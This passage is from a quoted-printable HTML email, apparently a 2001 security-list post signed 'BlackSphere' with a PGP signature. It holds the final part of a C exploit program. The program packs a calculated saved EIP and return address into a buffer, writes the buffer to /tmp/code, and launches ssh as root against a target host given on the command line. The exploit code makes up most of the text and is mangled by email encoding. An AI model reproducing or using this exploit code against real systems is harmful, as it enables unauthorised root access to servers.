<DIV> </DIV>
<DIV> buffer =3D (char *) malloc(29);</DIV>
<DIV> </DIV>
<DIV> ptr =3D (unsigned long *) buffer;</DIV>
<DIV> </DIV>
<DIV> *(ptr++) =3D 1543007393 + =
strtoul(argv[1],0,10);<BR> *(ptr++) =3D=20
0;<BR> *(ptr++) =3D strtoul(argv[7],0,10);<BR> *(ptr++) =3D=20
0;<BR> *(ptr++) =3D 16520 + =
strtoul(argv[2],0,10);<BR> *(ptr++) =3D=20
strtoul(argv[3],0,10);<BR> *(ptr++) =3D =
strtoul(argv[4],0,10);</DIV>
<DIV> </DIV>
<DIV> buffer[29]=3D0;</DIV>
<DIV> </DIV>
<DIV> for(i =3D 0 ; i < 27 ; i+=3D4)<BR> {<BR> aux =
=3D buffer +=20
i;<BR> ch=3D*aux;<BR> *aux=3D*(aux+3);<BR> =
*(aux+3)=3Dch;<BR> =20
ch=3D*(aux+1);<BR> *(aux+1)=3D*(aux+2);<BR> =20
*(aux+2)=3Dch; <BR> } </DIV>
<DIV> </DIV>
<DIV> printf("\nSaved Eip : &h + %u",1543007393 +=20
strtoul(argv[1],0,10));<BR> printf("\nReturn Address :=20
0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);<BR> printf("\nPacket =
Length :=20
%u",(strtoul(argv[3],0,10)+8) & ~7);<BR> printf("\nUsername =
Length :=20
%u\n\n",strtoul(argv[4],0,10));<BR> fflush(stdout);<BR> </DIV>
<DIV> </DIV>
<DIV> f =3D open("/tmp/code",O_RDWR |=20
O_CREAT,S_IRWXU);<BR> write(f,buffer,28);<BR> close(f);</DIV>
<DIV> </DIV>
<DIV> ssh =3D (char *) malloc(strlen(PATH_SSH) + 100 +=20
strlen(argv[5]));</DIV>
<DIV> </DIV>
<DIV> strcpy(ssh,PATH_SSH);</DIV>
<DIV> </DIV>
<DIV> sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root=20
%s",port,argv[5]);<BR> <BR> printf("%s\n",ssh);</DIV>
<DIV> </DIV>
<DIV> system(ssh);</DIV>
<DIV> </DIV>
<DIV> _exit(0); <BR>}</DIV>
<DIV> </DIV>
<DIV>-=20
-------------------------------------------------------------------------=
-----------</DIV>
<DIV> </DIV>
<DIV>BlackSphere - Hugo Oliveira Dias - 20 Fev 2001</DIV>
<DIV> </DIV>
<DIV>Email: <A =
href=3D"mailto:bsphere@clix.pt">bsphere@clix.pt</A><BR>Homepage: <A=20
href=3D"http://planeta.clix.pt/bsphere">http://planeta.clix.pt/bsphere</A=
></DIV>
<DIV> </DIV>
<DIV>-=20
-------------------------------------------------------------------------=
-----------<BR>-----BEGIN=20
PGP SIGNATURE-----<BR>Version: PGPfreeware 7.0.3 for non-commercial use =
<<A=20
href=3D"http://www.pgp.com">http://www.pgp.com</A>></DIV>
<DIV> </DIV>
<DIV>iQA/AwUBOpK/xBmmBmSsB+85EQLAWACgzdeSqpGTpz+TklsupMD5/KUCt6UAn248<BR>=
J2jw4HBHgb7MHR/vfYqMDY3l<BR>=3DOD22<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_0008_01C09BD0.DE9B5AC0--